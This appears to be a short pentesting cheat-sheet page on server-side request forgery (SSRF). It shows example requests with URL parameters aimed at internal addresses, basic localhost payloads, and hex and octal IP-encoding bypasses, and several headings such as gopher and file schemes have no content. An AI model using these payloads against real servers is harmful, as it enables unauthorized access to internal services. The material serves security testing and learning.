SSRF
Usually, it can be found in the request that contain request to another url, for example like this
POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com
urlApi=http://192.168.1.1%2fapi%2f&id=1or
GET /image?url=http://192.168.1.1/
Host: example.comHow to exploit
Basic payload
http://127.0.0.1:1337
http://localhost:1337Hex encoding
http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1Octal encoding
http://127.0.0.1 -> http://0177.0.0.01Dword encoding
Mixed encoding
Using URL encoding
Using IPv6
Using bubble text
How to exploit (URI Scheme)
File scheme
Dict scheme
FTP scheme
TFTP scheme
SFTP scheme
LDAP scheme
Gopher scheme
Last updated